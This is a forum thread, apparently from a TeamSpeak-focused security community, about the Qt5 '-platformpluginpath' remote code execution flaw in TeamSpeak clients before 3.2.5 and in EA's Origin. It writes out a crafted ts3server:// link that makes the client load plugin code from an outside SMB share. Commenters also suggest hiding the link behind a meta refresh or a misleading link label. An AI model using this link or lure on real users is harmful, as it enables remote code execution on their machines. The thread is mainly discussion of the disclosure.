- Sep 10, 2015
- 147
- 140
- 158
Remote Code Execution vulnerability in the Qt (Client < 3.2.5)
- Thread starter fyfywka
- Start date
- May 8, 2015
- 967
- 934
- 211
Qt5-Based GUI Apps Susceptible to Remote Code Execution
Through a little known command line argument, applications that configure custom protocol handlers and are are developed using the Qt5 graphical user interface framework can be exposed to a remote code execution vulnerability.
If it's that, you would need to trick the user to clicking something like
[URL=ts3server://voice.teamspeak.com -platformpluginpath \\192.168.131.152\share]ts3server://voice.teamspeak.com[/URL]
Last edited:
- Sep 10, 2015
- 147
- 140
- 158
- Jun 9, 2016
- 277
- 111
- 107
I don't think, because the vulnerability was From QT Not TeamSpeak. TeamSpeak is just an application uses QT.
- Jan 1, 2016
- 459
- 286
- 122
Very interesting. So basically you tell QT 'Ye, to load your DDLs pls look for them in "\\x.x.x.x\explt" when you start up thx'?
That means you can even put that on a website and kind of obfuscating the exploit in TS by putting the custom ts3server uri handler as a meta refresh on a page like this
That means you can even put that on a website and kind of obfuscating the exploit in TS by putting the custom ts3server uri handler as a meta refresh on a page like this
[url=mynotinnocenthomepage.com/puppies.html]mynotinnocenthomepage.com/puppies.html[/url], right?
InVaDeR359
Active Member
- May 29, 2017
- 160
- 121
- 72
I think you mean
[url=mynotinnocenthomepage.com/puppies.html]myinnocenthomepage.com/puppies.html[/url]
- Jan 1, 2016
- 459
- 286
- 122
Also a possibility but that my spark suspicion, when someone copies the link instead of clicking right away when the displayed URL is different from the one that is linked
If someone from the R4P3 community had found this, Asphyxia would probably have published a video on YouTube and put the exploit behind a paywall.
- Apr 25, 2015
- 1,845
- 2
- 2,199
- 327
No, any software development frameworks offer a lot of extensibility to developers so they can work with and around the operating system. With frameworks being so powerful, they have the potential to be abused and ultimately misused for malicious purposes by hackers. This issue was found regarding QT, not specifically TeamSpeak but thankfully they (TeamSpeak developers) are staying on top of security patches - probably because we have made them rightfully paranoid which is a GOOD thing. We have done our job, now we are safer.
With that said, there may be more security issues with many frameworks like QT (TeamSpeak uses this framework for their software).
One example can be found here: https://securiteam.com/unixfocus/5NP0O2KDPI/ or http://scary.beasts.org/security/CESA-2004-004.txt
I believe something similar to this was used when we developed the avatar crasher: https://r4p3.net/threads/teamspeak-3-avatar-crash-client-3-0-0-3-0-17.335/
If we found a way to utilize this vulnerability, we would have released a PoC (Proof of Concept) demonstrating how one could use this for educational purposes.
People like @Harrasan think everything in life comes free and no one has to work for anything, he is actually really close to being banned because you can find him complaining about everything and thinking proficient security researchers need $0 to run expensive servers and study for $8,000 reverse engineering classes for becoming a malware analyst and incident responder for the FBI/NSA/etc.
Update: A PoC is over here https://www.thezdi.com/blog/2019/4/...ugs-detailing-cve-2019-1636-and-cve-2019-6739
Looks very simple... a security mistake that is small with big issues possible.
Last edited:
Origin got hit by the same exploit.
techcrunch.com
AMD also uses QT, but looks like they don't have a URI registered, at least not on my system.
Security flaw in EA's Origin client exposed gamers to hackers | TechCrunch
Electronic Arts has fixed a vulnerability in its online gaming platform Origin after security researchers found they could trick an unsuspecting gamer
techcrunch.com
AMD also uses QT, but looks like they don't have a URI registered, at least not on my system.
Last edited: